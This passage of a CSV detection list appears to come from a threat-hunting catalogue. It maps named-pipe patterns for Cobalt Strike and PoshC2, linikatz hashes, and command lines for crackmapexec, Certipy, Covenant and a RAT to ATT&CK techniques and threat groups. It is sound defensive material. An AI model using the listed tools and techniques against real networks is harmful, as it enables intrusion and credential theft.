- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\netlogon_*","\\\\netlogon_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\ntsvcs*","\\\\ntsvcs.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\PGMessagePipe*","\\\\PGMessagePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\postex_*","\\\\postex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\postex_ssh_*","\\\\postex_ssh_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\samr_*","\\\\samr_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\scerpc_*","\\\\scerpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\SearchTextHarvester*","\\\\SearchTextHarvester.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\spoolss_*","\\\\spoolss_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\srvsvc_*","\\\\srvsvc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\status_*","\\\\status_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\UIA_PIPE*","\\\\UIA_PIPE.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\win\msrpc_*","\\\\win\\msrpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\winsock*","\\\\winsock.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\Winsock2\CatalogChangeListener-*","\\\\Winsock2\\CatalogChangeListener\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\wkssvc_*","\\\\wkssvc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\adhunt.py","\\adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "\jaccdpqnvbrrxlaf*","\\jaccdpqnvbrrxlaf.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "\Posh*","\\Posh.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "afrog -*","afrog\s\-.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2823","334","2024-04-30T08:02:02Z","2022-02-24T06:00:32Z" "b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "BypassUAC *","BypassUAC\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "cd PayGen","cd\sPayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "certipy *","certipy\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "cme smb *","cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 